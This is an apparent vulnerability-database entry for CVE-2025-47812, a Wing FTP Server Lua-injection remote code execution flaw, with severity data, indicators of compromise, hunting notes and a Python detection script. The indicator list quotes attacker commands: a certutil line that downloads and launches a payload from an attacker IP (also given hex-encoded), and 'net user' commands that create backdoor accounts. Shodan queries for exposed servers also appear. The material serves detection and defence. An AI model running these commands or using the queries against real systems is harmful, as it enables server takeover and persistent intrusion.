cbcvebase.
CVE-2025-47812
published 2025-07-10


Priority: P1 (100, critical)
CVSS 3.1: 10.0 (AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H)
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability: due 2025-08-04
Exploited in the wild
EPSS: 95.34% (99.9th percentile)
In Wing FTP Server before 7.4.4, the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. This is also exploitable via anonymous FTP accounts.

Affected (2 ranges)

Vendor       Product           Version range   Fixed in
wftpserver   wing_ftp_server   < 7.4.4         7.4.4
wftpserver   wing_ftp_server   <= 7.4.4

Detection & IOCs (extracted from sources)

ip: 185.196.9.225
url: http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ
filename: mvveiWJHx.exe
path: C:\Program Files (x86)\Wing FTP Server\session
path: C:\Program Files (x86)\Wing FTP Server\Log\
url: /loginok.html
command: certutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe
command: net user wingftp 123123qweqwe /add
command: net user wing 123123qweqweqwe /add
process: WFTPServer.exe
cookie: UID={{repeat('A', 2048)}}
port: 5466
bytes (hex):
636572747574696c202d75726c6361636865202d6620687474703a2f2f3138352e3139362e392e3232353a383038302f454f70343565574c53703547355577705f794f436951202554454d50255c6d76766569574a48782e6578652026207374617274202f42202554454d50255c6d76766569574a48782e657865
  • Hunt for anomalously large .lua session files in the Wing FTP session directory (C:\Program Files (x86)\Wing FTP Server\session); normal session files are small, inflated sizes indicate injected Lua payload.
  • Session .lua files containing 'local function hx(s)' or 'io.popen(cmd)' patterns indicate active Lua code injection exploitation of CVE-2025-47812.
  • Monitor POST requests to /loginok.html containing %00 (null byte) in the username parameter as the primary exploitation vector.
  • Alert on child processes spawned by WFTPServer.exe executing cmd.exe with reconnaissance commands (ipconfig, whoami, arp -a, net user) as post-exploitation indicators.
  • For CVE-2025-47813 (chained with CVE-2025-47812), detect POST requests to /loginok.html with an overlong UID cookie (2048+ bytes) that trigger error responses disclosing the server filesystem path.
  • Use Shodan/FOFA queries to identify exposed Wing FTP Server instances: http.html_hash:2121146066, http.favicon.hash:963565804, title:"Wing FTP Server", or Server header "Wing FTP Server".
  • Session object files are named with exactly 64 hexadecimal characters and a .lua extension; new files appearing in the session directory during/after suspicious login attempts warrant immediate review.
  • Anonymous login enabled on Wing FTP Server significantly lowers the exploitation bar — attackers can inject Lua without any credentials when anonymous access is permitted.
  • CVE-2025-47811 (Wing FTP running as root/SYSTEM with no privilege drop) was deemed unimportant by the vendor and remains unpatched even in v7.4.4, meaning any RCE via CVE-2025-47812 automatically yields highest-privilege execution.
  • The second trigger request (to deserialize the malicious session) can be any valid Wing FTP web endpoint, not just dir.html; defenders should not rely solely on monitoring dir.html requests.
  • Wing FTP log entries truncate the attacker's IP address during exploitation due to the null byte; the IP is only recoverable from the session .lua files themselves, not the domain logs.
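As an added example (not part of this CVE record and not Wing FTP Server's own tooling), the Python script below turns the first three hunting notes above into runnable checks: it scans a session directory for 64-hex-character .lua files that are oversized or contain the 'local function hx(s)' / 'io.popen(cmd)' strings, and it flags POST requests to /loginok.html whose username parameter carries a %00 byte. The size threshold, the request-log line format and all sample files and log lines are assumptions constructed for this example; point scan_session_dir at the real session path listed above and adapt LOG_RE to whatever proxy or web-server log format you actually have.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs

# Wing FTP session objects are named with exactly 64 hex characters plus .lua.
SESSION_NAME_RE = re.compile(r"^[0-9a-f]{64}\.lua$")
# Strings the detection notes associate with injected Lua.
INJECTION_PATTERNS = ("local function hx(s)", "io.popen(cmd)")
# Size above which a session file counts as anomalously large (assumed value; tune to your baseline).
MAX_NORMAL_SESSION_BYTES = 4096


def scan_session_dir(session_dir):
    """Return [(filename, [reasons])] for session files that look injected."""
    findings = []
    for path in sorted(Path(session_dir).iterdir()):
        # Ignore anything that is not a well-formed session object name.
        if not path.is_file() or not SESSION_NAME_RE.match(path.name):
            continue
        data = path.read_bytes()
        reasons = []
        if len(data) > MAX_NORMAL_SESSION_BYTES:
            reasons.append("oversized:%d" % len(data))
        text = data.decode("utf-8", errors="replace")
        reasons += ["pattern:" + p for p in INJECTION_PATTERNS if p in text]
        if reasons:
            findings.append((path.name, reasons))
    return findings


# Constructed request-log format (assumption): "<time> <client_ip> <method> <path> <form_body>"
LOG_RE = re.compile(r"^(?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<body>.*)$")


def is_null_byte_login(line):
    """True if the line is a POST to /loginok.html whose username field contains a NUL (%00)."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST" or m["path"].split("?")[0] != "/loginok.html":
        return False
    # parse_qs percent-decodes, so %00 in the raw body becomes a literal "\x00" here.
    fields = parse_qs(m["body"], keep_blank_values=True)
    return any("\x00" in value for value in fields.get("username", []))


def flag_log_lines(lines):
    """Return [(client_ip, line)] for every line that matches the null-byte login signature."""
    return [(LOG_RE.match(line)["ip"], line) for line in lines if is_null_byte_login(line)]


# Constructed sample data for this example (TEST-NET addresses, not the IoC IP above).
SAMPLE_LOG_LINES = [
    "2025-07-10T10:00:01Z 203.0.113.5 POST /loginok.html username=alice&password=s3cret",
    "2025-07-10T10:00:07Z 198.51.100.9 POST /loginok.html username=anonymous%00x&password=x",
    "2025-07-10T10:00:09Z 198.51.100.9 GET /dir.html -",
]


def build_sample_session_dir():
    """Create a temporary session directory with one benign and one injected-looking file."""
    d = Path(tempfile.mkdtemp())
    benign = "a" * 64 + ".lua"
    injected = "b" * 64 + ".lua"
    (d / benign).write_text('local userinfo = { username = "alice" }\n')
    (d / injected).write_text(
        "local function hx(s) return s end\n"
        'local cmd = "whoami"\nio.popen(cmd)\n'
        "-- " + "A" * 5000 + "\n"          # padding makes the file oversized as well
    )
    (d / "notes.txt").write_text("ignored: not a 64-hex .lua name\n")
    return d


if __name__ == "__main__":
    sample_dir = build_sample_session_dir()
    for name, reasons in scan_session_dir(sample_dir):
        print("suspicious session file:", name, reasons)
    for ip, line in flag_log_lines(SAMPLE_LOG_LINES):
        print("null-byte login from", ip, "->", line)
```

Both checks are deliberately narrow: the filename regex keeps the scan from touching unrelated files in the directory, and the log check decodes the form body rather than grepping for the literal "%00" so that an attacker's choice of encoding case does not matter. Because the notes say the server's own log truncates the client IP at the null byte, a proxy or WAF log in front of the service is the more reliable place to run the second check.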

CVSS provenance

nvd         v3.1   10.0   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck          10.0   CRITICAL
cisa               10.0   CRITICAL